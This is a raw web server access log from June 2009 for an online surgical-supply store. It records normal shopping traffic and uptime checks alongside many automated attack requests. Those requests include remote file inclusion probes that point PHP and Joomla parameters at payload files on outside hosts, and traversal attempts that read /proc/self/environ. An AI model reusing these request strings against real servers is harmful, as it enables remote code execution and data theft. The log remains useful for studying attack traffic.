24.7.183.45 - - [14/Jun/2009:23:55:05 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
62.173.171.118 - - [15/Jun/2009:00:01:21 -0400] "GET /logs//inc/formmail.inc.php?script_root=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:00:01:21 -0400] "GET //inc/formmail.inc.php?script_root=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:00:01:21 -0400] "GET /logs/access_log.Q109052600//inc/formmail.inc.php?script_root=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
140.112.125.75 - - [15/Jun/2009:00:03:09 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:09 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:10 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:10 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:10 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:10 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:11 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:11 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:12 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:12 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:12 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:12 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:13 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:13 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:13 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:13 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:14 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:14 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:14 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:14 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:15 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:15 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:15 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:15 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:16 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG HTTP/1.1" 200 45669 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:34 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:34 -0400] "GET /images/items/00320145_THUMB.JPG HTTP/1.1" 200 2238 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:03:34 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [15/Jun/2009:00:04:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
140.112.125.75 - - [15/Jun/2009:00:04:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG HTTP/1.1" 200 59894 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:04:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG HTTP/1.1" 200 59894 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362029700BC6F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:04:21 -0400] "GET /images/items/00200106_THUMB.JPG HTTP/1.1" 200 1533 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:04:21 -0400] "GET /images/items/00320103_THUMB.JPG HTTP/1.1" 200 2746 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
140.112.125.75 - - [15/Jun/2009:00:04:21 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0025624362428700CC4F041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
190.54.28.163 - - [15/Jun/2009:00:04:50 -0400] "GET /logs/access_log.Q109052300//components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:00:04:55 -0400] "GET //components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:00:05:00 -0400] "GET /logs//components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
62.149.163.198 - - [15/Jun/2009:00:05:27 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:05:27 -0400] "GET /rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 205 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:05:27 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:05:27 -0400] "GET /rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 205 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:05:28 -0400] "GET /logs/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:05:28 -0400] "GET /logs/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
211.239.150.144 - - [15/Jun/2009:00:06:16 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:00:06:26 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
79.174.72.67 - - [15/Jun/2009:00:07:35 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
62.149.163.198 - - [15/Jun/2009:00:08:01 -0400] "GET /logs/error_log.Q109051200/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 231 "-" "XXXXXX"
62.149.163.198 - - [15/Jun/2009:00:08:01 -0400] "GET /logs/error_log.Q109051200/rss.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "XXXXXX"
209.59.12.99 - - [15/Jun/2009:00:09:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.151 - - [15/Jun/2009:00:09:07 -0400] "GET /logs/access_log.Q107110300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [15/Jun/2009:00:11:15 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:15 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:17 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:21 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:21 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:22 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:11:23 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:11:23 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:11:23 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:24 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jun/2009:00:11:24 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jun/2009:00:11:24 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jun/2009:00:11:25 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
210.115.58.73 - - [15/Jun/2009:00:11:34 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:11:34 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:11:34 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:11:48 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:13:07 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:13:08 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:13:15 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:00:13:18 -0400] "GET /logs/access_log.Q109052300//components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
62.212.64.10 - - [15/Jun/2009:00:13:19 -0400] "GET /logs/access_log.Q109060600//e404.php?DOCUMENT_ROOT=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:13:19 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:13:19 -0400] "GET //e404.php?DOCUMENT_ROOT=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:00:13:19 -0400] "GET /logs/error_log.Q109041400//e404.php?DOCUMENT_ROOT=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.63"
190.54.28.163 - - [15/Jun/2009:00:13:23 -0400] "GET //components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jun/2009:00:13:27 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:00:13:28 -0400] "GET /logs//components/com_banners/banners.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.149.105.23 - - [15/Jun/2009:00:13:33 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
213.149.105.23 - - [15/Jun/2009:00:13:34 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
210.115.58.73 - - [15/Jun/2009:00:13:34 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.149.105.23 - - [15/Jun/2009:00:13:34 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
123.143.98.5 - - [15/Jun/2009:00:13:36 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:13:37 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:13:45 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:00:14:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.115.58.73 - - [15/Jun/2009:00:14:07 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:14:07 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [15/Jun/2009:00:14:10 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:14:10 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jun/2009:00:14:15 -0400] "GET /logs/access_log.Q109052600%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
